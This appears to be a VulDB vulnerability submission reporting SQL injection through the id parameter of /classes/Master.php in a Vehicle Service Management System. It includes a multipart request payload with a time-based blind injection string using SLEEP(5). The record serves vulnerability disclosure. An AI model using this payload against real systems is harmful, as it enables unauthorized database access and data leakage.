Title | SQL injection vulnerability exists in Vehicle Service Management Syste |
---|
Description | SQL injection vulnerability exists in id parameter of /classes/Master.php file of Vehicle Service Management System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit /admin/index.php and page parameter is ‘service_requests/manage_inventory’,it will include /admin/service_requests/manage_inventory.php,and id parameter can do sql injection.
Payload:
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"
------------YWJkMTQzNDcw
or
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"
------------YWJkMTQzNDcw
or
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="service"
1' AND (SELECT 1300 FROM (SELECT(SLEEP(5)))jEVY) AND 'nvqB'='nvqB |
---|
Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Vehicle%20Service%20Management%20System/Vehicle%20Service%20Management%20System%20-%20vuln%206.pdf |
---|
User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
---|
Submission | 15.04.2023 10:53 (2 лет назад) |
---|
Moderation | 15.04.2023 11:12 (19 minutes later) |
---|
Status | принято |
---|
VulDB Entry | 226105 [SourceCodester Vehicle Service Management System 1.0 /classes/Master.php id sql injection] |
---|
Points | 20 |
---|